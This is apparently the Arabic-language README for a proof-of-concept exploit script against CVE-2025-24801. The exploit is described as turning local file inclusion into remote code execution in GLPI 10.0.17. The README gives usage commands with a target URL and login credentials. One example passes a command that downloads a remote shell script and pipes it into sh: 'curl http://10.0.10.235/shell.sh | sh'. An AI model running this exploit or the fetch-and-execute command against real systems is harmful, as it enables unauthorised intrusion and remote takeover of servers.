
يستخدم هذا الاستغلال ثغرة CVE-2025-24801 للحصول على تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر تضمين الملفات المحلية (LFI) في GLPI 10.0.17. إثبات المفهوم (PoC) لهذه الثغرة مع شرح لهذه الثغرة الأمنية في GLPI.
تعرض بعض التطبيقات نقطة النهاية /glpi/ (مثل: http://172.16.11.130:8080/glpi/front/computer.form.php). إذا كان التطبيق المستهدف يتضمن نقطة النهاية هذه، فمن الضروري إضافتها إلى المعامل --url (مثل: --url http://172.16.11.130:8080/glpi).
مثال على الاستخدام.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
إذا كنت قد نفّذت هذا الاستغلال بالفعل وقمت بتشغيل RCE، يمكنك استخدام المعامل --cmd لتنفيذ الأمر فقط.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"